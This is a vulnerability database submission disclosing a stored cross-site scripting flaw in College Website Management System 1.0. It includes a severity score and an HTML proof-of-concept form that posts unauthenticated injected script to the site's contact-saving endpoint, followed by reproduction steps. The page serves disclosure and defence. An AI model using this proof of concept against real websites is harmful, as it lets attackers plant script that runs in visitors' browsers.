| Title | College Website Management System 1.0 - Cross-site Scripting Stored |
|---|
| Description | # Exploit Title: College Website Management System 1.0 - Cross-site Scripting Stored
# Date: 13/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Linux
Title:
================
College Website Management System 1.0 - Cross-site Scripting Stored
Summary:
================
The College Website Management System application is vulnerable to cross-site scripting (XSS) exploitation. Because of the lack of validation in authentication when exchanging contact information, it is possible to inject arbitrary javascript code causing a manipulation of browser features on the client side.
Severity Level:
================
7.5 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Affected Product:
================
College Website Management System v1.0
Steps to Reproduce:
================
1. Create an HTML file and paste the following code:
<html>
<title>CWMS XSS PoC</title>
<center>
<h1>CWMS XSS PoC</h1>
<form action="http://<TARGET>/cwms/classes/Master.php?f=save_contact" method="POST">
<p>School address<input type="text" name="school_address" placeholder="Inject XSS payload here"></input></p>
<p>Telephone<input type="text" name="school_tel_no" placeholder="Inject XSS payload here"></input></p>
<p>Email<input type="text" name="school_email" placeholder="Inject XSS payload here"></input></p>
<input type="text" name="map_coords" value="10.676033878642961, 122.9520835825518" hidden></input>
<button>Submit</button>
</form>
</center>
</html>
Add your target to "action" in the form and open that file using a browser.
2. Add a javascript code to one of the fields and send the request.
3. Go to http://target.com/cwms/?p=contact_us and you will find your changes made.
Note: the application owner has already been informed about the failure on March 13, 2022, I await a response. |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.ht |
|---|
| User | mrempy (ID 24379) |
|---|
| Submission | 13.03.2022 18:16 (2 years ago) |
|---|
| Moderation | 13.03.2022 20:29 (2 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Entry | 194846 |
|---|